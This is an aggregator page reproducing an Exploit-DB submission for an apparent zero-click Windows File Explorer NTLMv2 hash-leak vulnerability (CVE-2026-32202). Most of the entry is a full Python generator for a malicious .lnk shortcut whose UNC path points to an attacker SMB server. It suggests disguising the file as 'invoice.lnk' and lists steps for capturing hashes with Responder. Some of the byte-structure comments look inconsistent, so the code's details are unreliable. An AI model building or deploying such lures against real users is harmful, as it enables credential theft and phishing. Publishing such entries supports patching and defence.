惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Engineering at Meta
Engineering at Meta
人人都是产品经理
人人都是产品经理
大猫的无限游戏
大猫的无限游戏
博客园 - 三生石上(FineUI控件)
量子位
腾讯CDC
The Cloudflare Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
云风的 BLOG
云风的 BLOG
Vercel News
Vercel News
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
L
LangChain Blog
aimingoo的专栏
aimingoo的专栏
The Hacker News
The Hacker News
T
The Exploit Database - CXSecurity.com
B
Blog
S
SegmentFault 最新的问题
P
Privacy & Cybersecurity Law Blog
T
Threatpost
博客园 - 聂微东
T
Tailwind CSS Blog
The Last Watchdog
The Last Watchdog
C
Check Point Blog
N
Netflix TechBlog - Medium
D
DataBreaches.Net
爱范儿
爱范儿
IT之家
IT之家
S
Secure Thoughts
M
MIT News - Artificial intelligence
NISL@THU
NISL@THU
C
Cisco Blogs
TaoSecurity Blog
TaoSecurity Blog
有赞技术团队
有赞技术团队
A
Arctic Wolf
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
P
Proofpoint News Feed
Spread Privacy
Spread Privacy
Schneier on Security
Schneier on Security
Simon Willison's Weblog
Simon Willison's Weblog
G
GRAHAM CLULEY
雷峰网
雷峰网
Project Zero
Project Zero
博客园 - Franky
H
Heimdal Security Blog
A
About on SuperTechFans
Security Latest
Security Latest
Webroot Blog
Webroot Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Hugging Face - Blog
Hugging Face - Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
nu11secur1ty · 2026-05-29 · via Exploit-DB.com RSS Feed
# Titles: Microsoft - NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202

## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an
attacker to capture NTLMv2 hashes without user interaction. By crafting a
malicious .lnk (shortcut) file with a UNC path pointing to an
attacker-controlled SMB server, the target's Windows system automatically
sends an NTLMv2 authentication request when the folder containing the .lnk
file is opened. No click on the shortcut is required – simply viewing the
folder triggers the vulnerability.

**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)

**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025

**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)

STATUS: MEDIUM - HIGH/ Vulnerability

[+]Payload:

```POST
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```
[+]Exploit:

```
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""

import struct
import sys
import os

def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
share_name="share"):
    """
    Creates LNK file with UNC path to attacker machine
    """

    unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
    unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'

    # LNK structure (standard + vulnerable component)
    lnk = bytearray()

    # ===== HEADER (76 bytes) =====
    lnk.extend(struct.pack('<I', 0x0000004C))  # HeaderSize
    # LinkCLSID: {00021401-0000-0000-C000-000000000046}

lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
    lnk.extend(struct.pack('<I', 0x000002A3))  # LinkFlags
(HasName|HasWorkingDir|HasArguments|IsUnicode)
    lnk.extend(struct.pack('<I', 0x00000080))  # FileAttributes (NORMAL)
    lnk.extend(struct.pack('<Q', 0))           # CreationTime
    lnk.extend(struct.pack('<Q', 0))           # AccessTime
    lnk.extend(struct.pack('<Q', 0))           # WriteTime
    lnk.extend(struct.pack('<I', 0x00001000))  # FileSize
    lnk.extend(struct.pack('<I', 0x00000000))  # IconIndex
    lnk.extend(struct.pack('<I', 0x00000001))  # ShowCommand (SW_NORMAL)
    lnk.extend(struct.pack('<H', 0x0000))      # Hotkey
    lnk.extend(b'\x00\x00')                    # Reserved
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved2
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved3

    # ===== IDLIST (activates when folder is opened) =====
    # Shell Folder IDITEM
    lnk.extend(b'\x14\x00')                    # ItemID size (20 bytes)

lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
    lnk.extend(b'\x00\x00')                    # Terminating ID

    # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
    # NameString (UNC path - triggers NTLM hash leak)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)

    # ArgumentsString (empty)
    lnk.extend(b'\x00\x00')

    # WorkingDir (UNC path again)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)

    # ===== Console Properties (required for some Windows versions) =====
    lnk.extend(b'\x50\x00\x14\x00')           # dwWindowSize (80x20)
    lnk.extend(b'\x50\x00\xfa\x00')           # dwBufferSize (80x250)
    lnk.extend(b'\x00\x00\x00\x00')           # dwFontSize
    lnk.extend(b'\x00\x00\x00\x00')           # dwFontFamily
    lnk.extend(b'\x00\x00\x00\x00')           # dwFaceNameLen
    lnk.extend(b'\x00\x00\x00\x00')           # dwFaceNameOffset
    lnk.extend(b'\x00\x00\x00\x00')           # dwStyle
    # 64 bytes padding
    lnk.extend(b'\x00' * 64)

    # Save the file
    with open(output_file, 'wb') as f:
        f.write(lnk)

    return output_file, unc_path

def main():
    print(r"""
    ╔═══════════════════════════════════════════╗
    ║  CVE-2026-32202 - LNK Generator           ║
    ║  Author: nu11secur1ty                     ║
    ╚═══════════════════════════════════════════╝
    """)

    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP>
[output_file]")
        print("Example: python3 cve_2026_32202_gen.py 192.168.1.100
invoice.lnk")
        sys.exit(1)

    attacker_ip = sys.argv[1]
    output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"

    lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)

    print(f"[+] Exploit ready!")
    print(f"[+] File: {lnk_file}")
    print(f"[+] UNC path: {unc_path}")
    print()
    print("[*] Next steps:")
    print(f"    1. Start Responder: sudo responder -I eth0 -v")
    print(f"    2. Transfer {lnk_file} to Windows 11 Desktop")
    print(f"    3. Open Desktop in File Explorer (no click required)")
    print(f"    4. Watch Responder - NTLM hash will appear")
    print()

    with open("start_responder.sh", "w") as f:
        f.write("#!/bin/bash\n")
        f.write("echo \"[+] Starting Responder...\"\n")
        f.write("sudo responder -I eth0 -v\n")
    os.chmod("start_responder.sh", 0o755)
    print("[+] Helper script created: start_responder.sh")

if __name__ == "__main__":
    main()
```


Demo:
[href](https://www.patreon.com/posts/cve-2026-32202-159362448)

Code:
[code](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)

Time spent:
02:30:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/

On Wed, May 27, 2026 at 2:06 PM Offsec Exploits <
submit@offensive-security.com> wrote:

> Hello,
>
> Thank you for your submission.
> We will be checking it shortly.
>
> Regards
> - Exploit-DB Team
>


-- 

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>